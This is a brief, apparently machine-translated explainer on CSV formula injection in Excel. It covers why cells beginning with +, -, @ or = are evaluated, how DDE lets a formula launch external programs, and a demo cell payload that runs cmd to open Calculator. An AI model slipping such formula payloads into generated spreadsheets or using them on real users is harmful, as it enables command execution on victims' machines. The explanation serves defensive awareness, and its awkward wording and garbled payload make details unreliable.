CSV file injection vulnerabilities Brief

"For network security, everything external input are not credible" . But the CSV file injection vulnerabilities indeed often been overlooked, reason may be because our minds first impression is the CSV file as a plain text file, failed to cause alarm.

First, the vulnerability definition

By constructing a malicious attacker in the CSV file command or function, so that normal users malicious commands or functions to be executed after use Excel to open the CSV file, resulting in aggressive behavior.

Second, the causes of vulnerability results

1, CSV file several special symbol "+, -, @, ="

Try entering "= 1 + 1" in the CSV cell, after the transport, the value found into a cell 2, as he said operation number is Minga executed.

In addition to the plus sign, "-", "@", "=" it will be interpreted as a formula.

2、DDE（Dynamic Data Exchange）

DDE is an inter-process communication protocol under Windows, is a dynamic data exchange mechanism, using DDE communication requires two Windows applications, which as a server process information, and the other as a client to obtain information from the server. DDE support Microsoft Excel, LibreOffice and Apache OpenOffice. Excel, Word, Rtf, Outlook can use this mechanism to handle updates based on the results of an external application. So if we make contain DDE formula CSV file, so when you open the file, Excel will attempt to execute external applications .

Third, the vulnerability demo

1, OS command execution

By building DDE formula in the CSV file, you can call CMD achieve the purpose of the implementation of operating system commands.

As shown below, input 1 + cmd in the cell |! '/ C calc' A0, after the transport box will pop up a Excel, Excel reminder need to start another program (cmd), click Yes, Windows Calculator will pop window.